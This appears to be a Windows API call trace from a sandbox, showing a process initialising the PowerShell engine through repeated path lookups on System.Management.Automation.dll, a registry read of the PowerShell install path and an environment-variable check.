	[0104.447] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0104.447] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0104.448] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed370, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0104.448] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0104.448] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0104.448] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0104.449] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0104.449] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0104.449] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xed978 | out: phkResult=0xed978*=0x38c) returned 0x0
	[0104.449] RegQueryValueExW (in: hKey=0x38c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xed8fc, lpData=0x0, lpcbData=0xed8f8*=0x0 | out: lpType=0xed8fc*=0x1, lpData=0x0, lpcbData=0xed8f8*=0x56) returned 0x0
	[0104.449] CoTaskMemAlloc (cb=0x5a) returned 0x1b31c000
	[0104.449] RegQueryValueExW (in: hKey=0x38c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xed8cc, lpData=0x1b31c000, lpcbData=0xed8c8*=0x56 | out: lpType=0xed8cc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xed8c8*=0x56) returned 0x0
	[0104.449] CoTaskMemFree (pv=0x1b31c000) 
	[0104.449] RegCloseKey (hKey=0x38c) returned 0x0
	[0104.450] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0104.450] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0104.450] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0104.451] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0104.451] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0104.451] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0104.452] CoTaskMemAlloc (cb=0x104) returned 0x28e290
	[0104.452] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x28e290, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0104.452] CoTaskMemFree (pv=0x28e290) 
	[0104.453] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0104.453] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0104.454] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0104.454] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0104.454] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0104.454] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0104.455] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0104.455] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0104.455] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0104.455] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0104.456] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0104.456] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0104.456] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0104.456] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0104.456] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0104.457] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0104.457] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0104.457] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0104.457] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0104.457] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0104.458] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0104.458] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0104.458] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0104.521] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0104.522] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0104.522] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0104.522] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0104.523] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0104.523] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0104.523] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0104.524] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0104.524] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0104.524] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0104.524] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0104.524] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0104.524] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0104.525] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0104.525] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0104.525] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0104.525] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0104.526] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0104.526] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0104.526] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0104.526] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0104.526] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0104.527] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0104.527] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0104.527] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0104.538] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec350, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0104.538] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0104.538] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
